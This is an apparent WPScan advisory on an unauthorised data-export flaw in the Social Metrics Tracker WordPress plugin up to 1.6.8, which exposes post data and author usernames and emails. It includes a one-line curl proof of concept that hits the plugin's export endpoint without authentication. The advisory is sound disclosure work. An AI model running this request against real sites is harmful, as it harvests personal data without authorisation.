Social Metrics Tracker <= 1.6.8 - Unauthorised Data Export



Description
The lack of proper authorisation when exporting data from the plugin could allow unauthenticated users to get information about the posts and page of the blog, including their author's username and email.

The plugin is still affected and has been closed.
Proof of Concept
curl https://example.com/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1

Affects Plugin

no known fix
- plugin closed

Classification

Type BYPASS

Miscellaneous

Views 907
Verified Yes
WPVDB ID 10104

Timeline

Publicly Published 2019-09-18 (10 months ago)
Added 2020-03-02 (4 months ago)
Last Updated 2020-03-02 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin